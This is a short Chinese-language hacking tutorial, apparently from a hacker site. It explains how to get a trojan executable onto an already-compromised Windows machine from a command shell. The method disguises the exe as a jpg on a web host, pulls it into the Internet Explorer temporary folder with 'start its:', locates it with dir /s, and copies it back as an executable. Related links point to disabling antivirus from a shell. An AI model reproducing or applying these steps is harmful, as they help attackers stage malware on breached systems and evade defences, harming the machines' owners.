原理就不多说了，把要上传的文件或木马的exe后缀名改成jpg或gif等可以上传到网站空间上的文件类型。
打个比方上传后的地址为：http://www.hack520.org/hqw.jpg。我们在Shell下输入：start its: http://www.hack520.org/hqw.jpg。这样会把hqw.jpg下载到IE的临时文件夹中，这些下载的临时文件的命名有一个特点，就是会保存成hqw[1].jpg，如果有其它同名的情况，还可能会保存为hqw[2].jpg一类的。如果是exe文件就会提示下载，这样没有达到我们的目的。

　　我们用dir /s hqw[1].jpg这个命令来搜索具体的目录。如图，搜索出来的路径为：
C:\Documents and Settings\hqw20\Local Settings\Temporary Internet Files\Content
.IE5\89OVGV07 的目录

然后用退出到C盘根目录，用命令
copy “C:\Documents and Settings\hqw20\Local Settings\Temporary Internet Files\Content
.IE5\89OVGV07 ” hqw.exe
就可以将我hqw[1].jpg还原成hqw.exe，此时hqw.exe处于C盘根本目录。

看看hqw.exe是否正常运行，完全正常。

• CMDShell下文件上传的另一绝佳方法分析与应用
• 教你在CMDShell下干掉瑞星